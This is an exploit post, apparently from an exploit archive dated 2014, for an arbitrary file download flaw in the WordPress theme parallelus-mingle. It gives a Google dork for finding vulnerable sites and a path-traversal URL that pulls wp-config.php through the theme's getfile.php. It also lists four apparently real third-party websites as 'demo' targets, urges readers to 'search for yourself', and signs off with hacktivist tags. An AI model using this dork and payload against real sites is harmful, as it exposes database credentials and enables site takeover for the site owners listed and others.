facebook facebook twitter rss

WordPress theme parallelus-mingle Arbitrary File Download Vulnerability

Author: Pro_Mast3r , Published: 02-11-2014
# WordPress theme parallelus-mingle  Arbitrary File Download Vulnerability .


# Author: Pro_Mast3r .


# Date: 2014/11/1


# Google Dork: inurl:/themes/parallelus-mingle/ .


# Author E-mail : Pro.Mast3r@hotmail.com .


# Category: webapps .


# platform: php


# Vendor: tess
|Theme Name: parallelus mingle
|Theme URI: http://themeforest.net/item/mingle-multipurpose-wordpress-theme/235056
|Author: Parallelus
|Author URI: http://para.llel.us/

#poc
http://127.0.0.1/wordpress/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php

# demo :
http://baiadearta.ro/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://2012.underhillfest.me/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://www.flyingcolorscanine.com/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://laspenas.com/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php

more .. Search for yourself
----
#exploit4arab
#IRAQ Cyber Army

Like us on Facebook :